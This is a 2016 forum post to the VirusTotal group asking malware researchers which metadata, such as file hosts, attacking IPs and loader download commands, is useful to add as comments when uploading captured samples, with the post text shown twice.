Malware metadata for researchers, what should be added to captured malware?
467 views
Skip to first unread message
Henry
May 10, 2016, 3:40:43 AM5/10/16
to VirusTotal
When uploading captured malware to virustotal, what additional metadata is useful to researchers?
I've been trying to collect some additional information about the capture which I add as comments, but I would like some input from malware researchers or AV vendors about what metadata to provide.
The data I collect and report on is:
- Malware file host
- Attacking IP's using this file host
- The command line commands used to download the loader script
- The script downloading the platform variants
- The malware in various platform variants (also giving a list of platform variants found at the same file host)
I assume many of the collected IP's won't be valid for a long period of time, same goes for attacking IP's (which might include decoys), but perhaps some patterns can be found.
Examples:
https://www.virustotal.com/en/file/c0355a82051e3d7a3c744d9409b6cc33e4d31cb547cea72eed95400cfe1b74a1/analysis/
https://www.virustotal.com/en/file/c163b79decaec6a4b8e396d468091757b6348ec8a9e058cb6578474dc282f8c8/analysis/
Are the reports (in the comments) useful? How can they be improved? When providing metadata, would it be useful to provide the data in a machine-readable format like json?
I've been trying to collect some additional information about the capture which I add as comments, but I would like some input from malware researchers or AV vendors about what metadata to provide.
The data I collect and report on is:
- Malware file host
- Attacking IP's using this file host
- The command line commands used to download the loader script
- The script downloading the platform variants
- The malware in various platform variants (also giving a list of platform variants found at the same file host)
I assume many of the collected IP's won't be valid for a long period of time, same goes for attacking IP's (which might include decoys), but perhaps some patterns can be found.
Examples:
https://www.virustotal.com/en/file/c0355a82051e3d7a3c744d9409b6cc33e4d31cb547cea72eed95400cfe1b74a1/analysis/
https://www.virustotal.com/en/file/c163b79decaec6a4b8e396d468091757b6348ec8a9e058cb6578474dc282f8c8/analysis/
Are the reports (in the comments) useful? How can they be improved? When providing metadata, would it be useful to provide the data in a machine-readable format like json?
Reply all
Reply to author
Forward
0 new messages